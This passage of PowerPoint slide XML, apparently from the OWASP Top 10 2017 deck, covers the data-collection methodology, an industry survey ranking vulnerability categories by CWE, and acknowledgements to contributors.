          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>+RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Details About Risk Factors</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle: Rounded Corners 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94B94A4E-B1A5-47EC-811D-ED0E559DC71C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="7620000"/>
            <a:ext cx="6096000" cy="1371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spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TBD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This will be added post-RC2 after further data analysis is completed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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sz="3600" dirty="0"/>
              <a:t>+Dat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methodology and Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="5410200"/>
            <a:ext cx="6172200" cy="3308598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Public Data Call</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Traditionally, the data collected and analyzed was more along the lines of frequency data; how many vulnerabilities found in tested applications. As is well known, tools traditionally report all instances found of a vulnerability and humans traditionally report a single finding with a number of examples. This makes it very difficult to aggregate the two styles of reporting in a comparable manner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>For 2017, the incidence rate was calculated by how many applications in a given data set had one or more of a specific vulnerability type. The data from many larger contributors was provided in two views: The first was the traditional frequency style of counting every instance found of a vulnerability, the second was the count of applications that each vulnerability was found in (one or more time). While not perfect, this reasonably allows us to compare the data from Human Assisted Tools and Tool Assisted Humans. The raw data and analysis work is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>available in GitHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>. We intend to expand on this with additional structure for 2020 (or earlier).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>We received 40+ submissions in the call for data, as many were from the original data call that was focused on frequency, we were able to use data from 23 contributors covering ~114,000 applications. We used a one year block of time where possible and identified by the contributor. The majority of applications are unique, though we acknowledge the likelihood of some repeat applications between the yearly data from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Veracode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>. The 23 datasets used were either identified as tool assisted human testing or specifically provided incidence rate from human assisted tools. Anomalies in the selected data of 100%+ incidence were adjusted down to 100% max. To calculate the incidence rate, we calculated the percentage of the total applications there were found to contain each vulnerability type. The ranking of incidence was used for the prevalence calculation in the overall risk for ranking the Top 10. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="990600"/>
            <a:ext cx="6172200" cy="1554272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>At the OWASP Project Summit, active participants and community members decided on a vulnerability view, with up to two (2) forward looking vulnerability classes, with ordering defined partially by quantitative data, and partially by qualitative surveys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Industry Ranked Survey</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>For the survey, we collected the vulnerability categories that had been previously identified as being “on the cusp” or were mentioned in feedback to 2017 RC1 on the Top 10 mailing list. We put them into a ranked survey and asked respondents to rank the top four vulnerabilities that they felt should be included in the OWASP Top 10 2017. The survey was open from Aug 2 – Sep 18, 2017. 516 responses were collected and the vulnerabilities were ranked.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="4006694"/>
            <a:ext cx="6172200" cy="1261884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Exposure of private information is clearly the highest-ranking vulnerability, but fits very easily as an additional emphasis into the existing A3:2017 Sensitive Data Exposure. Cryptographic Failures can fit within Sensitive Data Exposure. Insecure deserialization was ranked at number three, so it was added to the Top 10 as A8:2017 after risk rating. The fourth ranked User Controlled Key is included in A5:2017 Broken Access Control; it is good to see it rank highly on the survey, as there is not much data relating to authorization vulnerabilities. The number five ranked category in the survey is Insufficient Logging and Monitoring, which we believe is a good fit for the Top 10 list, which is why it has become A10:2017. We have moved to a point where applications need to be able to define what may be an attack and generate appropriate logging, alerting, escalation and response. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="Table 15"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2729242397"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457199" y="2670695"/>
          <a:ext cx="5867402" cy="1194378"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="338504">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4995497">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="533401">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="1" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Rank</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="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b="1" i="1">
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Survey Vulnerability Categories</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b="1">
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Score</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99063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>1</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Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Exposure of Private Information ('Privacy Violation') [CWE-359]</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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>748</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="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99063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>2</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Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Cryptographic Failures [CWE-310/311/312/326/327]</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Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>584</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99063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>3</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Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Deserialization of Untrusted Data [CWE-502]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="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Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>514</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99063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>4</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Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Authorization Bypass Through User-Controlled Key (IDOR &amp; Path Traversal) [CWE-639]</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Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>493</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199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>5</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Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Insufficient Logging and Monitoring [CWE-223 / CWE-778]</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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>440</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="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35327902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sz="3600" dirty="0"/>
              <a:t>+Ack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Acknowledgements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 14"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1962066259"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1047750"/>
          <a:ext cx="6858000" cy="8040931"/>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502639">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t>Acknowledgements to Data Contributors</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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38598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latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>We’d like to thank the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> many </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>organizations that </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>contributed their vulnerability data to support the 2017 update:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab pos="266700" algn="l"/>
                          <a:tab pos="361950" algn="l"/>
                          <a:tab pos="1885950" algn="l"/>
                          <a:tab pos="1971675" algn="l"/>
                          <a:tab pos="3409950" algn="l"/>
                          <a:tab pos="3495675" algn="l"/>
                          <a:tab pos="4933950" algn="l"/>
                          <a:tab pos="5019675" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0"/>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endParaRPr lang="en-US" sz="900" u="none" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>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endParaRPr lang="en-US" sz="900" u="none" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>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r>
                        <a:rPr lang="en-US" sz="900" u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>For the first time, all the data contributed to a Top 10 release, and the full list of contributors, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>is publicly available</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0"/>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5334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Acknowledgements to Individual Contributors</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="31450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u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>We’d like to thank the individual contributors who spent many hours collectively contributing to the Top 10 in GitHub.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="92D050"/>
                        </a:solidFil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5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A19514B-B0EA-4CF0-809D-97D7C4B7BBDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20628691"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="119062" y="1814697"/>
          <a:ext cx="6619875" cy="3006090"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3884102497"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3477021267"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1190969635"/>
                    </a:ext>
                  </a:extLst>
